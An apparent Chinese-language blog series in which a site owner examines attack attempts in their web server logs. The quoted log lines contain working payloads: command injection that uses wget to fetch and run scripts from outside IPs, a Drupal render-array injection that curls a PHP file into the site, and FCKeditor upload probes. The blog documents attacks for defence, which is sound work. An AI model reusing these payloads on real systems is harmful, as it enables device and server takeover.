從 Web Log 學習系統漏洞 23

限制了 HTTP request method 之後少掉了不少蒼蠅, 不過還有一個還沒想到該怎擋, 每天一堆隨機IP也不曉得是不是真的

:
156.202.37.153 - - [18/Aug/2018:18:44:30 +0800] "GET /login.cgi?cli=aa%20aa%27;wget%20http://80.211.67.245/k%20-O%20/tmp/ks;chmod%20777%20/tmp/ks;sh%20/tmp/ks%27$ HTTP/1.1" 400 226 "-" "LMAO/2.0"

:

183.102.221.196 - - [19/Aug/2018:15:17:44 +0800] "GET /login.cgi?cli=aa%20aa%27;wget%20http://209.141.33.86/d%20-O%20-%3E%20/tmp/ff;sh%20/tmp/ff%27$ HTTP/1.1" 400 226 "-" "Gemini/2.0"

從 Web Log 學習系統漏洞 22

在網站設定上一直沒有阻擋全部的HTTP連線方式(GET, POST, HEAD, PROPFIND...), 不過每天上百個測試連線垃圾Log實在看了很煩, 決定還是擋一擋, 果然清靜不少

很好奇的反連今天跑來測試我網站的IP, 應該是被漏洞入侵的路由器, 然後被當成跳板?殭屍? 再連來我的網站測試

對方IP的Router登入介面

Router機器的官網

從 Web Log 學習系統漏洞 21

估狗不到是什麼, 這入侵攻擊竟能回傳200正常回應

195.250.98.130 - - [07/Aug/2018:10:00:57 +0800] "POST //?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=curl+-o+sites/default/files/wolf.php+'http://djcaa.org/tes.aff' HTTP/1.1" 200 3554 "-" "libwww-perl/6.15"

從 Web Log 學習系統漏洞 20

Fckeditor (現改為CKEditor) 漏洞攻擊？

185.234.218.153 - - [02/Aug/2018:18:12:51 +0800] "GET //admin/images/cal_date_over.gif HTTP/1.1" 404 228 "-" "python-requests/2.19.1"
185.234.218.153 - - [02/Aug/2018:18:14:23 +0800] "GET //admin/login.php HTTP/1.1" 404 213 "-" "python-requests/2.19.1"
185.234.218.153 - - [02/Aug/2018:18:15:23 +0800] "GET //templates/system/css/system.css HTTP/1.1" 404 229 "-" "python-requests/2.19.1"
185.234.218.153 - - [02/Aug/2018:18:15:53 +0800] "GET / HTTP/1.1" 200 3554 "-" "python-requests/2.19.1"
185.234.218.153 - - [02/Aug/2018:18:16:25 +0800] "GET //fckeditor/editor/filemanager/connectors/php/upload.php?Type=Media HTTP/1.1" 404 252 "-" "python-requests/2.19.1"